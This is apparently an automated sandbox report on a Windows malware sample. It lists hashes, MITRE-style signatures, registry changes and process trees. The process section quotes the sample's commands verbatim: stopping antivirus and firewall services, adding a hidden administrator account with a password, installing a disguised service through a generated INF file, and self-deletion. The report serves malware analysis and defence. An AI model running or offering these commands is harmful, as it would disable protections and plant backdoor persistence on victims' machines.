Malware Analysis Report

2025-03-15 00:52

Sample ID 240626-s5ga7atfmr
Target 128394c4fa5db44d001d415665c98edf_JaffaCakes118
SHA256 33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257
Tags
defense_evasion persistence
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257

Threat Level: Likely malicious

The file 128394c4fa5db44d001d415665c98edf_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion persistence

Grants admin privileges

Event Triggered Execution: Image File Execution Options Injection

Executes dropped EXE

Adds Run key to start application

Modifies WinLogon

Hide Artifacts: Hidden Users

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 15:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 15:42

Reported

2024-06-26 15:44

Platform

win7-20240611-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

Signatures

Grants admin privileges

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe\Debugger = "SoundMan.exe" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SoundMan.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe = "C:\\Windows\\system32\\ctfmon.exe" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\interne.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
File created C:\Windows\SysWOW64\ttjj6.ini C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoundMan.exe C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
File created C:\Windows\1.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\1.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\SysWOW64\rundll32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\runonce.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SoundMan.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cacls.exe
PID 1716 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2772 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2664 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2784 wrote to memory of 1928 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2628 wrote to memory of 2680 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\runonce.exe
PID 2684 wrote to memory of 2484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2680 wrote to memory of 2520 N/A C:\Windows\SysWOW64\runonce.exe C:\Windows\SysWOW64\grpconv.exe
PID 2512 wrote to memory of 2528 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2772 wrote to memory of 2560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2560 wrote to memory of 1416 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1716 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe C:\Windows\SoundMan.exe

Processes

C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

C:\Windows\SysWOW64\cacls.exe

cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net user new1 12369 /add&net user new1 12369&net user new1 /active:yes&net localgroup administrators new1 /add

C:\Windows\SysWOW64\cmd.exe

cmd /c echo [Version]>%windir%\1.inf&echo Signature="$WINDOWS NT$">>%windir%\1.inf&echo [DefaultInstall.Services]>>%windir%\1.inf&echo AddService=helpsvc,,My_AddService_Name>>%windir%\1.inf&echo [My_AddService_Name]>>%windir%\1.inf&echo DisplayName=Help and Support>>%windir%\1.inf&echo Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖于此服务的服务将无法启动。>>%windir%\1.inf&echo ServiceType=0x10>>%windir%\1.inf&echo StartType=2 >>%windir%\1.inf&echo ServiceBinary=%11%\interne.exe>>%windir%\1.inf&echo ErrorControl=0 >>%windir%\1.inf&rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\1.inf&del %windir%\1.inf&exit

C:\Windows\SysWOW64\net.exe

net user new1 12369 /add

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\Windows\1.inf

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 12369 /add

C:\Windows\SysWOW64\net.exe

net user new1 12369

C:\Windows\SysWOW64\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 12369

C:\Windows\SysWOW64\net.exe

net user new1 /active:yes

C:\Windows\SysWOW64\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user new1 /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup administrators new1 /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup administrators new1 /add

C:\Windows\SoundMan.exe

C:\Windows\SoundMan.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c echo ping 127.1 -n 3 >nul 2>nul >c:\2.bat&echo del C:\Windows\system32\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe>>c:\2.bat&echo del c:\2.bat>>c:\2.bat&c:\2.bat

C:\Windows\SysWOW64\PING.EXE

ping 127.1 -n 3

Network

N/A

Files

memory/1716-0-0x0000000000400000-0x0000000000437000-memory.dmp

C:\Windows\1.inf

MD5 8a3cdcae5040a0e9ffda840903292d09
SHA1 968fb550eec0f3726c1b828a01d0496429502f7c
SHA256 8b5ac0c6629193fec6b4052aa330fe309679a9d248d150cc68e291a54a8a77d9
SHA512 669fdfc661c94be7e6bec7d6fbd2307d7494b4f5c26840ac99d1580ffeaf4b71e96798e5e0d223ebdc676c047e7a3aa3695711613098ded0b942796089c95f3a

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\SoundMan.exe

MD5 1063293cd7bcdafef5dab258a6c55eb6
SHA1 89a06e65acb702df0cb96ef513b042fa01c22ec9
SHA256 c99121e7f999dd4f12583929c3bd6b2f7481b58f42ef7b2cc0e2540c09b80218
SHA512 61c8e730bc9ac5a647ad11500a135028702ac3e9b3c8882e006760d48d662fc736d93ad2e876d050377bf987915998ffbdfa18f8c48a40942903b49856a91f49

memory/1716-34-0x0000000000400000-0x0000000000437000-memory.dmp

memory/1716-37-0x0000000000400000-0x0000000000437000-memory.dmp

C:\2.bat

MD5 6410f1dd47e0842c546c3fca681f6a38
SHA1 bc9e0e091b79b26c389b5c99c9896fd3d73a9bf2
SHA256 4794dcea80d8427d282d6eea007dbf0572b3b2b27dbfe7d7727e5a46eb945a92
SHA512 932a4a1f8ff336952bc4c4250af20d34b6bb0cca86f6e34e1eff019294c7cea1c198fa56d7ae54b6fb5c253489173b7346c2e37a233960d93e523f91aea68e47

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 15:42

Reported

2024-06-26 15:44

Platform

win10v2004-20240508-en

Max time kernel

125s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1280,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/4664-0-0x0000000000400000-0x0000000000437000-memory.dmp